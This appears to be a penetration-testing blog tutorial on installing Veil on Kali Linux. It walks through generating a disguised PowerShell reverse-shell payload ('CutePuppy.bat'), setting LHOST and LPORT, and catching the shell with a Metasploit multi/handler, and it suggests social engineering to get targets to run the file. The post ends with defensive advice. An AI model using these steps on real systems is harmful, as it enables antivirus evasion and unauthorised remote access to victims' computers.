Anti-Virus Bypass with Veil on Kali Linux

One of the common hurdles of Ethical Hackers and Penetration Testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs. A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

In this article we will discuss how to install and run Veil on Kali Linux. Since the previous version of this article there have been several changes to Veil. The first is that it is now much easier to install and run Veil on Kali Linux. Veil directly supports Kali 2018 and installs by only running two commands. Another change is that Veil includes new payloads written for additional languages.

Read more about the updates at https://www.veil-framework.com/.

INSTALLING VEIL

Tool GitHub Page: https://github.com/Veil-Framework/Veil

Installing Veil 3.x on Kali 2018 is very simple:

Veil Evasion Kali Linux

The install will then run for a while as the dependency packages are installed. Reboot when finished.

STARTING VEIL

Now let’s look at using Veil.

  • In a terminal window, enter, “veil

AV bypass 1

Veil offers two tools, Evasion and Ordinance. We want to run Veil-Evasion.

  • Enter, “use 1

AV bypass Veil 2

The Veil title menu bar should change to “Veil-Evasion”.

USING VEIL-EVASION

The first thing to do is to list the available payloads using the “list” command.

  • Type “list” and then press enter.

AV bypass 3

PowerShell attacks are very popular, so let’s use a PowerShell payload. Just enter the “use” command and the number of the payload that you want. In this tutorial we will use the “powershell/meterpreter/rev_tcp.py” payload.

  1. Type, “use 22” and hit “enter”.

This will select the payload and present us with the following screen:

bypassing AV 4

If you look at the options, you will notice that it looks (and acts) very similar to using Metasploit modules. For this module we will just need to set the LHOST variable to our Kali system IP address.

2. Type, “set LHOST 192.168.1.39” and then hit “enter”.

3. Now enter, “options” to view the value that we just set:

bypassing AV 5

We will leave the LPORT set to the default value of 4444. Now we just need to generate our shellcode.

4. Enter, “generate

Veil will now generate the shellcode with the options that we chose.

5. Now we need to give our created file a filename or base name, I chose “CutePuppy”.

Veil-Evasion now has all that it needs and creates our shellcode file. We should see something like the following output:

bypassing AV 6

This screen shows what payload was used and also where the output file is located. In this instance, the file was placed in the “/var/lib/veil/output/source/” directory. When it is run on a Windows system, it will try to connect out to our Kali machine. But before we do, we will need to start a Metasploit handler to accept the connection. The handler runs in Metasploit and waits until the shell file (CutePuppy.bat in this instance) is opened. Once it is executed, it creates a remote shell between your Windows system and the Kali box.

GETTING A REMOTE SHELL

To create the remote handler, we will be using Metasploit. You can use the RC file generated by Veil, but I prefer to do it manually.

  1. Start the Metasploit Framework from the Kali Quick Start menu.
  2. Now set up the multi/handler using the following settings:
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.39
  • set LPORT 4444
  • exploit

This starts the multi handler on the Kali System:

bypassing AV 7

Now we just need the target computer to run the file that Veil generated.

3. Copy “CutePuppy.bat” to your Windows Desktop:

bypassing AV 8

4. Now, double click on the .bat file to run it.

Nothing appears to happen, but on your Kali system, you should see this:

bypassing AV 9

A reverse shell session!

5. Now if we type “shell”, we see that we do in fact have a complete remote shell:

bypassing AV 10

The big question is, can this bypass anti-virus? At the time of this writing I ran the PowerShell based CutePuppy.bat file on a fully updated Windows 10 system running an updated Anti-Virus and it did detect it as malicious.

Anti-Virus engines have become much better at detecting PowerShell based threats. There are other options you can use in Veil. I will not cover this step by step, but using the “c/meterpreter/rev_tcp.py” payload provided different results.

Generating it into a test.exe file:

bypassing AV 12

We have a shell:

bypassing AV 13

CONCLUSION

Hopefully this article has shown that you cannot trust in your Anti-Virus alone to protect you from online threats. Unfortunately, sometimes your network security depends on your users and what they allow to run. Instruct your users to be very leery of internet links and never open any attachments that they receive in unsolicited e-mails. Blocking certain file types from entering or leaving your network is also a good idea.

Finally, use a Network Security Monitoring system (and logs) to help track down what happened and what was compromised if the worst does happen.

Advertisements